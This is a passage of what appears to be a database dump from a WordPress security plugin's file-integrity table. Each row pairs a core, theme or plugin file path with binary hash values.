��S\'�}S~S��b���','',0,'?'),('Q��cm�uX\Z3�B+��X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�0M/�}�*��Hkt','��qb�{�^в���4#\\�����xkW�~[�4','',0,'?'),('Q���PA���鐚�z�','wp-includes/blocks/columns/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�_Pwx�RC=2R','��v+)�l6��F7�F�$��4\"�|n\0}','',0,'?'),('Q�t��$oGoE�$�:�','wp-content/plugins/wp-cerber/assets/flags/sy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oi�&\0�0$l6��','�/<7�\n�W�6�H~�G�K \"�L���','',0,'?'),('Q��6K4������H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xAI6m�NdSpVBׇ','Z?�RA��+�7#�C�-�\\4g[o?J�_�g','',0,'?'),('Q�x��̿Py���\'uE|','wp-includes/blocks/page-list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���~6�[��s���','�/E|r^�#}�j�㽬]qv�A�	������','',0,'?'),('Q��-�C-]C����','wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%���\nG\n���R6','���v$�͏���,��5�6X�~Xʧ��ℐ���','',0,'?'),('Q�`���8�M�8','wp-admin/press-this.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'xq��>�/���EQ�L','>��k�(���B�������h\\�ѫ͜:','',0,'?'),('Q��W4��q�#��\Z �','wp-content/themes/newsmagbd/vendors/normalize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0	����*���<<w�R�','~0/��ڐ�6J�^�sZP7�@	\0dt�Z/���','',0,'?'),('Q�.ì�\\���XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�F��Y��\"�4\\�','fN���ϻ`�\nq�^�Z\Z~�<��\'�I[�!�','',0,'?'),('Q�����l��g�-��','wp-admin/js/comment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�t��(-��p�y\r�','޳Ȋ����;|�X��1�Ij6���g[��5�','',0,'?'),('R�v5��W6�`�ھ�','wp-includes/css/dist/nux/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z+�n���.U��hSz>','�ItV�(�|����D(��;��fܱh������H','',0,'?'),('R3�Us�3��}T��','wp-includes/js/autosave.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Nj�cJ�n�H�\'','��T%��#�5r����c5��꘩����m7','',0,'?'),('RQ�b7f�� |~ۓ�(','wp-admin/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�>�A�P�P�u4Ą�','�����v�5ᐪmє\"-�*~`�`Qg1F��/','',0,'?'),('Rj�q�Iӏ\Z�Y&�','wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0\rJ`X�\"8�by','oHi��Y�N3	>����_����J�,���S^','',0,'?'),('R���1?���Y�VDt�','wp-content/plugins/wordfence/lib/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('R�b�:Z�K��L�','wp-admin/js/application-passwords.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','An��f�.t�7H�t��','�E��\0��D�.�<��\'���iZAƬ4n�','',0,'?'),('R�x�4Mp@�9u\n֊ p','wp-includes/images/wpspin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('R��|Rx/�bzn9\0*�J','wp-admin/includes/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Y�``��_���','��ڨ��c���:Wv�Y�м�mz�����cQ�\r','',0,'?'),('R�\\SC�|ju�9��A','wp-includes/js/media-grid.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?Z��e��ʠ','��.R%/��F��v`����R�j���>�О','',0,'?'),('R¥�����Le�q	�&�','wp-admin/js/user-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jl�,��f.�Vh��','��\ZԂ	8�՜g\\����IS�����グ6���','',0,'?'),('R��ܰoL�8~\\�lCR','wp-includes/blocks/audio/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T,G\\2*eA���~��','�6SN�\'�ct�<\n,HW��01����K','',0,'?'),('R�H\r0��!�d�?c&','wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�����\"��0�S`�','n��pޯ�J��w��2��c�QdN�p�o,��','',0,'?'),('R�����\'����','wp-content/themes/newsmagbd/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|˺�\"���\r1\'&�*','P��:F܉\ZF^$T�˞~�pd��0��7TK','',0,'?'),('R�J����<�{D\n','wp-content/themes/newsmagbd/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NJx�E��q�у&�','�\n݌TI֝E�c��U$�:SզـS�KCsy�','',0,'?'),('S?�d�xS���َ@','wp-includes/blocks/query-pagination/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[��?��m$�a','��O�Gd6G�Kv55ɮ���qc\06.�(�AW�;','',0,'?'),('S.FȫA�j���(�:','wp-includes/js/hoverIntent.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"��T���Ҩ�b~','G��OEr~�\'ǟ���9��\Z:)�g�-','',0,'?'),('S0�־��K/17u���','wp-includes/js/jquery/ui/selectmenu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Wj*m��Es�','�l$1dT��z֬�H\r���*�xQ��,e4e','',0,'?'),('SLdt���Q®���','wp-content/plugins/redirection/database/schema/233.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=�Gq d�4�r','$���4� ����Pc�M��)K\\�g2�=ѯ`�','',0,'?'),('SX+7�1?���-','wp-includes/js/jcrop/Jcrop.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('Sj�~6��{�����X','wp-admin/css/colors/modern/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�!�<�.{��=','�N_FT\Z�B�/�d,-���ب��39��d_�','',0,'?'),('SzW��NKUS��','wp-includes/blocks/calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�����cE8,\n','�O%�7ܧ�^V�x��n~���\r�8���i.3-','',0,'?'),('S���O[N�.�v�e','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('S�C��i1ۭ�j�','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��|�6�V!�;O','�J��DƜ������.�[������)�{�','',0,'?'),('S����p�>��Wr�YE','wp-comments-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.K��OQ ��ga��','LJ��h��`*�dr�}�6-�߁P�Q��{�','',0,'?'),('S�dlz�s�V7','wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�~МI�XP/��$','�s�em��/�;��֘���� aZ�H`�g3','',0,'?'),('S��t� ��J�9���G','wp-includes/css/dist/block-directory/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����(�3�3i�ָ�','���]9@�T�Tx�k���>��v�\0Yi�~H,0','',0,'?'),('S���\n�pލG%�','wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('S��&�az8�Jض9�','wp-includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�\n��[��F3җ','��H�d\nh�	��/X���qF��.����H���','',0,'?'),('S�!)q���O�����','wp-content/plugins/wp-cerber/languages/wp-cerber-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WG=E7}�>C&�$�','j�?�nlFR�|�qY�^�^}P�o����4r�','',0,'?'),('S�^�7jK5I6K�2!','wp-includes/Requests/Cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�V���sUN���d�','\"��+f5f(gdC��<i�˳]uƨ2�ļ','',0,'?'),('T�r���~�W]�','wp-includes/class-wp-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J0n�N.��yƪb��','�}�u\0tE\n�&���yt2���B���','',0,'?'),('T6K?���s� �7(�','wp-includes/customize/class-wp-customize-sidebar-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('T:�Dğ.&l�\Z?�&�A','wp-content/plugins/wp-cerber/assets/flags/in.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�weIɻ�j籏��{\n','��4x�\n��<~�z����{��V��Я\"N�','',0,'?'),('T?�?:q׮P��ah\'��','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���AN�X[`h\0����','�\"xI�B6�E?�����i�\'26�5y/��','',0,'?'),('TM����l����','wp-admin/includes/class-wp-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O\'<r,x�ib��$','MqރR�3=E�8C�@^��@ò�~�qv�M���','',0,'?'),('Tw��=��+�6����','wp-includes/js/tinymce/wp-tinymce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�f��\'2|0��5','����P�s	$d}ё%����H󃤀��8�','',0,'?'),('T�.o@Ψ2�w�v��X�','wp-includes/js/jcrop/jquery.Jcrop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/a��Lru�4�\Z�','���Ϸ��yd�ix�{�p+��n�eځ��f�','',0,'?'),('T���vm?,�a���T4�','wp-includes/ID3/module.audio-video.quicktime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ր��%���3/�*','Z{��[�W�ڤ�ʑ\nM%9I5+�$3�@^�','',0,'?'),('T���\r�fV�+� j�','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxX��JT��bx���','f��x�/�x��G�\n8�5�6�	Z�+','',0,'?'),('T�>��<�_\"g','wp-content/plugins/wp-cerber/assets/flags/nf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2���rJizڜS��','�P�w�.�^}��\Z�ފڝ3q�{���','',0,'?'),('T��`5���2z/>�w','wp-includes/blocks/query-pagination/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̽����@}�l���','��{�;�т�6�<�s��\r\'~�y�2��2LT-r','',0,'?'),('T�.��)m�&����I','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�41l#}�p���zk1','��h��	�_��֚����!E��4�\Zv��F��','',0,'?'),('T܌�7`\0���(�','wp-includes/js/mediaelement/renderers/vimeo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('U�\\p{J��O�Q�&','wp-includes/SimplePie/Cache/Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ĞA�ʖ�䦴j��','��oO��w��~9K����4oY�[K�e��\\RG','',0,'?'),('UI�_����Ym���_','wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o\\��%k�&�е��','WW��?���,#zNt���� qC����.g�F','',0,'?'),('Uf��\\%���J7','wp-content/plugins/redirection/models/flusher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']P�R=H�F�u/����','����+qϋ>�9����l�F�VɊ�z�e\\','',0,'?'),('U�.��G\0��h7K','wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��Dz��겊��T','s�׷my(�[�~��M������N�Ԙ��;i','',0,'?'),('U� $A=�He�|�zȖ(','wp-includes/Requests/SSL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��SUa �o�����','�&�K��ps֍y�\Z�@?7G��c��#EU�','',0,'?'),('U�nɓb4lZ,I','wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VUKI�L�%[��#�p','��y�=�Ϻ�r��w�s�r�����׷�b��','',0,'?'),('U�~�UO:c#3#W��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	,�	^��R6Մ��l','�&x{�e5��ɔ�|��c��J��\Z���Ȓ','',0,'?'),('U���$i\"u��&��9','wp-includes/images/crystal/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('V\n��U`�_�5���8','wp-includes/js/customize-base.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@a���<����','eƭ�ǃ��=���ܠFB}�:�r�bb��l','',0,'?'),('V��<�7G�n���','wp-includes/blocks/separator/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=2cRPm�`mL�','�y.�Y&�N	�\r�M�����\Z�B���','',0,'?'),('V�\r�3#��J��{','wp-includes/sodium_compat/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�7�{(G5��','5<��H���X0���t�>�-�������','',0,'?'),('V#7A�����@�?���)','wp-content/plugins/wordfence/views/unsupported-php/admin-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(`��HMD��A�7�9','y��I~	@V�Y247�&�U��uމ����','',0,'?'),('V2�L��\0ۺ��','wp-includes/js/jquery/ui/controlgroup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�##�=�F=��\\�v','��>733hE}���z�[)�e�Z0�ߨ!�$/Ӿ�','',0,'?'),('V?�O�N���e�ZF\\�','wp-includes/js/jquery/ui/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������Z����a��','�\"����!f�~xXW��ۜ��4�Ȗ$:��2/','',0,'?'),('VE��8�k�b�g&:,','wp-includes/blocks/post-content/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+c;N��/�ݠv�.','��\Z�$��#�k\\=�����Z��G�v��܌o','',0,'?'),('VL6�7G^l%D5z3��','wp-includes/default-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�B z\\f\0�����','%�rN8*G#��C��UᴭP�z�p_-���\n֌','',0,'?'),('Vi\'��Ru�h:���u�','wp-includes/blocks/query-pagination-previous.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�W�D��\"�\'�b�3','����B\rہ��ys�]��D\\am�ݺO��BC�n','',0,'?'),('Vne!�z0u1?��','wp-includes/shortcodes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Vo	h�,X��','��E[�?�����e˝Rc��O��4�\'_��\r','',0,'?'),('Vrm�KE�p�j��6�','wp-admin/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('V�����댏$�x','wp-admin/js/post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�?�.�r�֪V��U','�����y��l�\0��9�/�~pm��\0Ҋ�','',0,'?'),('V����rz�(�nol*','wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)��S4�C@�r\0\\Z','\0�n�b�ǻ���I꾊N�܂��Ӡ�fR�z�','',0,'?'),('V׀��\'h��Ĉ+:��','wp-admin/includes/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�xo�$�}f�\\�]��','e�M3V\"�d0����/0o���u�T�k��','',0,'?'),('V�C\n�W���<&od+�','wp-content/plugins/redirection/models/group.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	:�C\02�;Eշ�\r ','��V5�\",7�Sp�9q�A�$��P1�P�0��','',0,'?'),('V���1)�~����O','wp-content/plugins/wp-cerber/assets/wrench.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�3�Cb�C-2!�Q�','�;�����մ��xj�E����%Z�P�c��','',0,'?'),('Ws�$8�~��Nȁ-�@','wp-includes/js/mediaelement/mediaelementplayer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�ĪL��5��!\n�','o��^:v\\���m���o����cTW[���k','',0,'?'),('W&�ִ �)+�ڱ���','wp-admin/includes/class-plugin-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�2cً�����\"\'�','�h�)���Eюw0@$�,\0�3��~�Y\0��]=','',0,'?'),('W8h�!ɩk�ĉ\'�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�RU�b�*��\0\'�','x����<�s��BZ�2�j��RM\'0%$��i{ V','',0,'?'),('W;1C\\:~��D���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-logged-in-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Kۦ��81yR�','){e���`�v�)?/��;wnh�x�r���%�','',0,'?'),('Wl[_��-�콞	�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-brute-force-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�8�\n�n�yJF ��','^ђ��L�x��Wx5)�DAx��\r�h�:@','',0,'?'),('Ws��{N�hP�r�㼱','wp-content/plugins/wordfence/lib/dashboard/widget_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��9�64\"�k��y','�X�������\"v����-*������3','',0,'?'),('Wx\Z�Ta��7{��','wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�|��s,�=�K#�','6���ly�6ɦi��3U���,�E[鲓9��','',0,'?'),('W{�g- X��\'=n8','wp-admin/moderation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�EVU��u�������','��Fq�6��1����<���w�t&�b����1��','',0,'?'),('W})Ӗ7���e�}5�9,','wp-admin/load-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@:����whv��zP4','��E�n�; W:�Z�R|�X��(1��U�b�/','',0,'?'),('W��LjN/�@Ϣ�ư�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T	��nr�k���','�;\\��Xځ��/0;��Q�P�.�B4��\Z�','',0,'?'),('W�->�)c�����2�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('W��5�Ν�>�_`|��','wp-content/plugins/wp-cerber/assets/flags/py.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����UƸ_��`U��','���s�d��-��ǁ&ǂ��v�	&l:��V','',0,'?'),('X��\\shv]�iB�','wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','݇�(�0,m�G_Y�3','^�)o�B������f�g�*�V�P�?�~��u:','',0,'?'),('X\"=�̅�ޘa�an�]�','wp-content/themes/newsmagbd/inc/theme_hook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�Q�l�×��\"|C9��','pt,�&LO��$��h��7��2f��n������','',0,'?'),('X,�E�Cj$_��8I��0','wp-includes/images/smilies/icon_cool.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��`����ivj.�','�事F�9;2_	�$�$~�LO�a��6���_','',0,'?'),('Xg#�m\rf�j�7m�^','wp-includes/blocks/post-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�F��P�/\"4����','�U%Q��]UÝ�<@�ݾ�>̒��qn�i�ma','',0,'?'),('X�۩�i)�9Y���','wp-content/plugins/redirection/actions/nothing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[�	�}Wُ ','��pí4ũ����[�{��������/��','',0,'?'),('X��M����xڳ�J�','wp-includes/Requests/Hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��AQ��U;:�BH��i','�՚���� Q�憐D�P��؂_?y�`�����','',0,'?'),('X�:8+˓2>V]��8�','wp-admin/images/sort-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Aìk�:�bтvFj','\'���aK�\0tGJ�Bq��XW*(J|1���z[(','',0,'?'),('X���v�\Zƒ��\"�$','wp-includes/Requests/Exception/HTTP/409.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|:���7�Ȳu�O','���_M��8U���.pF����w�:E`�MB��','',0,'?'),('X�2�FGr��m��F��','wp-includes/blocks/button/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��߄z�2�8#�Ւrq','�+\Z���J��S�a�r�<fm+� a53��!�','',0,'?'),('X�?M-H?���Al8/','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-acct-activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H|��wcC�6�ʕ','��\nA022?�rק.���jJ5�G��rZ','',0,'?'),('X�s��Yq���ePL','wp-includes/blocks/code/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��]��i0��k�v�','N�)Ϡ8���Ђ��#��^;�l�x�X�0�','',0,'?'),('X���G������z�X','wp-admin/includes/class-wp-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'?hQ?�ҹ`��V�','�+��>��T��3�lو��5;\0U�9v�]�','',0,'?'),('X�~�Vzl!_�]/�-3','wp-content/plugins/wordfence/models/firewall/wfFirewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��C��#B�sT�b','×GH����5kӹr�ܰRR��_�x�-�','',0,'?'),('X�k(D��qț��G��','wp-includes/js/jquery/ui/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�U���Ƥ����','��f,p��`��qR��2�\Z^v�6��`��s�$','',0,'?'),('X��N��8�j����c�','wp-includes/blocks/post-excerpt/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�6�%�}�:&fM��','�+$E�kҭw�֍\rS:�|K>�_c�\0=I<q','',0,'?'),('X�=�2h4�/{�+','wp-includes/spl-autoload-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��u�{�t���','��,�Z\rM	>܅��g�p�/�	Z\Z#`!�.','',0,'?'),('X�TCW_^��og��','wp-admin/includes/class-wp-debug-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0=���1��H�\r���','\"��O�����\Z���D�7� �����\\0f','',0,'?'),('Y����bڧ,��J','wp-includes/Requests/Exception/HTTP/405.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r)qOel����N��~','j�b�횄��^U�sv8�$b����M�3y�','',0,'?'),('Y�%\n��#�,��l.j�','wp-content/plugins/redirection/locale/redirection-gl_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n��O�[�u])wJ�8r','�B�k#��M��-�<V_����Ȼ2\r��d��','',0,'?'),('Y&�6��ڳ��6����','wp-content/plugins/wp-cerber/assets/flags/mg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��;��P�IH\\�','�d|�-uc�P�����V����Oh�`��_','',0,'?'),('Y(�K���g\0��_��','wp-includes/js/dist/annotations.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�����d^����j','P6?&Fj9ì%�?���~)g�����Q�','',0,'?'),('Y,Qp�gmu#�e���~','wp-includes/widgets/class-wp-nav-menu-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;d��|h{�fw0.�','7a&5$��m��\Zj�?#�l:Ű�\0Fжfǃm)=','',0,'?'),('Y/�ޑ�	���\Z���','wp-includes/js/dist/escape-html.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�)�V�\"3�j�','Pt\ZY6�x2J�8�A���d8a��&|\'��I','',0,'?'),('YBt\n�\nc�ݟ.��vi','wp-content/plugins/wordfence/views/diagnostics/text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n���W�hg��q�','�;�<c��6�|_�]�)�m����}pd���g	','',0,'?'),('YV�2��9}D8�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=on~Z���TOQ�Be','�<�H���\"��F�@����%���1`7<��	��}','',0,'?'),('Y�La���h�(','wp-admin/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���k�����W','���\\�p+0��^��\Z�U�� ^��^���f','',0,'?'),('Y�,�e�A��w�`���','wp-includes/images/media/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����h�\0��ì�u','\0�Bb�3��\'��\'��)JG ��](G�9Pr2 s','',0,'?'),('Y�BWy	+�B�Om�z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��:��N�\'�Dx��N','�[��_|А�~E����+�~�E�(�`�_��','',0,'?'),('Y�68�H;%,�_c\n�','wp-includes/css/wp-auth-check.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j��b�u��=�`c','�\r[�B�{\'C�N5zZw� pȈ��I�K�e ��','',0,'?'),('Y�J+{�o(�A%f�e�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dܹ<9N1g�%�C���','o�c��̺m�J �\nK�\"�Fו�Kc�E��','',0,'?'),('Y�J��|��[D��y�Y','wp-content/plugins/wordfence/waf/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('Y����]���ŞI���','wp-includes/js/jquery/ui/effect-slide.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I^�\Z+:C��)H[','Y��� �%��!���d!F��r`�݀��4','',0,'?'),('Y֝��U����}�r/','wp-includes/SimplePie/Cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��~ܯ{ʹ���+h�','�md�����n�nun�pU0 l��6���Zi�R','',0,'?'),('Y�UL�5J�ޔ�v[�','wp-includes/rest-api/search/class-wp-rest-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��x&����{\n�x�\\','�sޢ���zj�λ�\'Ҳ���wE�?��','',0,'?'),('Y�S�%3X�ȴ���T�','wp-content/plugins/redirection/locale/redirection-fr_CA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�|��:�|�I','̇��K����nj0p-��/�~].�M�c�C�K�','',0,'?'),('Y�>1�7{6\">�2f*�:','wp-content/plugins/wp-cerber/assets/flags/uy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','txd)b}PJ��kJ@�8','	